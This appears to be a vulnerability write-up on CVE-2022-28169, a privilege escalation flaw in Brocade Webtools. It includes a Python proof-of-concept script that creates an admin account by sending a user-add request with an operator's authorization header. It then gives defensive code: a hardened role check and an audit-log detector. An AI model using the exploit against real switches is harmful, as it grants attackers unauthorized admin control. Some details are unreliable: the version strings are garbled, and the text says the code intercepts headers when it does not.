In this long-read post, we shall delve into a concerning vulnerability discovered in Brocade Webtools, found in Brocade Fabric OS versions before v9.1.1, v9..1e, and v8.2.3c. This vulnerability, identified as CVE-2022-28169, enables low-privileged Webtools users to gain admin rights or other privileges beyond their designated limits. As a consequence, users who are not admins can create a new user with the admin role by abusing an operator's session ID. The issue occurs because admin and operator authorization headers are transmitted unencrypted, and it can be reproduced by intercepting a user-addition request and altering it to carry the operator's authorization header.

Exploit Details

The Brocade Webtools vulnerability CVE-2022-28169 takes advantage of the fact that admin and operator authorization headers are sent unencrypted. This makes it easier for attackers to intercept and manipulate these headers to escalate privileges by editing user addition requests. The code snippet below demonstrates the steps taken to exploit this vulnerability:

import requests

# intercepting the admin and operator authorization headers
admin_auth_header = 'admin_auth_header_here'
operator_auth_header = 'operator_auth_header_here'

# crafting the malicious user addition request
new_admin_user_payload = {
  "username": "malicious_user",
  "password": "strong_password",
  "role": "admin"
}

# replace the original admin header with the operator header
headers = {
  'Authorization': operator_auth_header
}

# send the request with the altered header
response = requests.post('https://<target>/user/add', json=new_admin_user_payload, headers=headers)

if response.status_code == 200:
  print("Success: New admin user created.")
else:
  print(f"Error: Could not create admin user. Server responded with {response.status_code}")

The code above intercepts the admin and operator authorization headers before crafting a malicious user addition request. It then replaces the admin header with the operator header and sends the request to create a new admin user.
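The snippet above shows the request from the attacker's side; the root cause, however, sits on the server, which honors a user-add request on the strength of a valid session header alone without checking which role that session holds. The following is an added example, not Brocade's or the Webtools code: it models the weak authorization pattern beside a hardened one, and adds a sweep over audit-log lines for the symptom a defender would look for (a successful POST to /user/add from a non-admin session). The session ids, roles, request shape and log format are all constructed for illustration.

```python
"""Role check for a user-add endpoint, weak form beside hardened form,
plus a log sweep for the resulting symptom.

Added example, not Brocade's or the Webtools code. It models the class of
flaw described for CVE-2022-28169: a user-creation request is honored on the
strength of a valid session header alone, so a session that belongs to an
operator can create an admin account. Session ids, roles, the request shape
and the audit-log format are all constructed for illustration.
"""

# Constructed session store: session id -> authenticated principal.
SESSIONS = {
    "sess-admin-1": {"user": "admin", "role": "admin"},
    "sess-oper-7": {"user": "operator1", "role": "operator"},
}

# Constructed role ordering used to stop a caller granting more than it holds.
ROLE_RANK = {"user": 0, "operator": 1, "admin": 2}


class AuthorizationError(Exception):
    """Raised when a request is authenticated but not permitted."""


def vulnerable_add_user(session_id, payload, users):
    """Weak pattern: any valid session may create a user with any role.

    Only authentication is checked. The role that gets stored comes straight
    from the request body, so an operator session (for example one whose
    header was captured from unencrypted traffic) can mint an admin account.
    """
    if session_id not in SESSIONS:
        raise AuthorizationError("unauthenticated")
    users[payload["username"]] = payload["role"]
    return users[payload["username"]]


def hardened_add_user(session_id, payload, users):
    """Fixed pattern: authorization is derived from the session, not the body.

    The role bound to the session decides whether user creation is allowed at
    all, the requested role must be a known one, and it may not exceed the
    caller's own rank.
    """
    session = SESSIONS.get(session_id)
    if session is None:
        raise AuthorizationError("unauthenticated")
    caller_role = session["role"]
    if caller_role != "admin":
        raise AuthorizationError(f"role {caller_role!r} may not create users")
    requested_role = payload.get("role")
    if requested_role not in ROLE_RANK:
        raise AuthorizationError(f"unknown role {requested_role!r}")
    if ROLE_RANK[requested_role] > ROLE_RANK[caller_role]:
        raise AuthorizationError("cannot grant a role above the caller's own")
    username = payload.get("username")
    if not username or username in users:
        raise AuthorizationError("missing or duplicate username")
    users[username] = requested_role
    return requested_role


# Constructed audit-log lines in a simple key=value format.
AUDIT_LOG = [
    "ts=2022-10-25T21:15:00Z session=sess-admin-1 method=POST path=/user/add status=200",
    "ts=2022-10-25T21:16:00Z session=sess-oper-7 method=GET path=/switch/status status=200",
    "ts=2022-10-25T21:17:00Z session=sess-oper-7 method=POST path=/user/add status=200",
    "ts=2022-10-25T21:18:00Z session=sess-unknown method=POST path=/user/add status=401",
]


def parse_audit_line(line):
    """Split 'k=v k=v ...' into a dict; tokens without '=' are skipped."""
    fields = {}
    for token in line.split():
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    return fields


def find_escalation_attempts(lines, sessions=SESSIONS):
    """Return audit entries where a non-admin session successfully hit /user/add.

    A 2xx user-add from a session whose bound role is below admin is the
    observable symptom of the flaw; unknown sessions are reported as well,
    since a 2xx for them would mean the authentication check failed outright.
    """
    findings = []
    for line in lines:
        entry = parse_audit_line(line)
        if entry.get("method") != "POST" or entry.get("path") != "/user/add":
            continue
        if not entry.get("status", "").startswith("2"):
            continue
        role = sessions.get(entry.get("session"), {}).get("role", "unknown")
        if role != "admin":
            findings.append({"ts": entry.get("ts"), "session": entry.get("session"), "role": role})
    return findings
```

The hardened handler never reads a privilege decision from the request body: the caller's role comes from the server-side session record, and the requested role is validated against a known list and capped at the caller's own rank. The log sweep turns the same rule into a detection, which is useful on devices that cannot be patched immediately.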

For those interested in investigating further, please refer to the following resources:

- CVE-2022-28169 Details
- Brocade Fabric OS Security Advisory
- Brocade Webtools Documentation

Mitigation

To protect against this vulnerability, it's crucial to upgrade to the latest Brocade Fabric OS versions (v9.1.1, v9..1e, or v8.2.3c) that contain fixes for CVE-2022-28169. Organizations should also ensure all communication between servers and clients is encrypted to prevent unauthorized access to sensitive information such as admin and operator authorization headers.

Conclusion

CVE-2022-28169 poses a significant risk, as low privilege webtools users can escalate their roles to admin level, leading to unauthorized access to sensitive data or disruption of systems. To safeguard against this vulnerability, organizations should update their Brocade Fabric OS to the latest, patched versions, and secure all data transfers with encryption. Additionally, it's essential to stay informed about new vulnerabilities and apply remediation measures in a timely manner to keep systems protected from potential exploits.

Timeline

Published on: 10/25/2022 21:15:00 UTC
Last modified on: 03/02/2023 16:05:00 UTC